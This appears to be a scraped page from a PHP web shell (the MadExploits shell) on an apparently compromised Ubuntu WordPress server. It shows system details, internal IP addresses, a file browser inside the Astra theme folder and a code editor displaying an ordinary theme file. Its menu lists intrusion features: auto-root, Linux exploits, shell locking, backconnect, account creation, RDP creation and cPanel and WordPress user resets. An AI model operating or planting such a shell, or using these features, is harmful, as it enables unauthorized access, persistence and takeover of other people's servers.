Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
themes /
astra /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
metabox
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
theme-update
[ DIR ]
drwxr-xr-x
admin-functions.php
1.71
KB
-rw-r--r--
class-astra-after-setup-theme....
9.63
KB
-rw-r--r--
class-astra-dynamic-css.php
297.26
KB
-rw-r--r--
class-astra-extended-base-dyna...
6.43
KB
-rw-r--r--
class-astra-global-palette.php
8.53
KB
-rw-r--r--
class-astra-loop.php
7.33
KB
-rw-r--r--
class-astra-mobile-header.php
6.06
KB
-rw-r--r--
extras.php
42.42
KB
-rw-r--r--
google-fonts.php
225.87
KB
-rw-r--r--
index.php
120
B
-rw-r--r--
markup-extras.php
71.72
KB
-rw-r--r--
template-parts.php
9.9
KB
-rw-r--r--
template-tags.php
1.15
KB
-rw-r--r--
widgets.php
4.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-tags.php
<?php /** * Custom template tags for this theme. * * Eventually, some of the functionality here could be replaced by core features. * * @package Astra */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } if ( ! function_exists( 'astra_entry_footer' ) ) : /** * Prints HTML with meta information for the categories, tags and comments. */ function astra_entry_footer() { if ( ! is_single() && ! post_password_required() && ( comments_open() || get_comments_number() ) ) { echo '<span class="comments-link">'; /** * Get default strings. * * @see astra_default_strings */ comments_popup_link( astra_default_strings( 'string-blog-meta-leave-a-comment', false ), astra_default_strings( 'string-blog-meta-one-comment', false ), astra_default_strings( 'string-blog-meta-multiple-comment', false ) ); echo '</span>'; } astra_edit_post_link( sprintf( /* translators: %s: Name of current post */ esc_html__( 'Edit %s', 'astra' ), the_title( '<span class="screen-reader-text">"', '"</span>', false ) ), '<span class="edit-link">', '</span>' ); } endif;
Close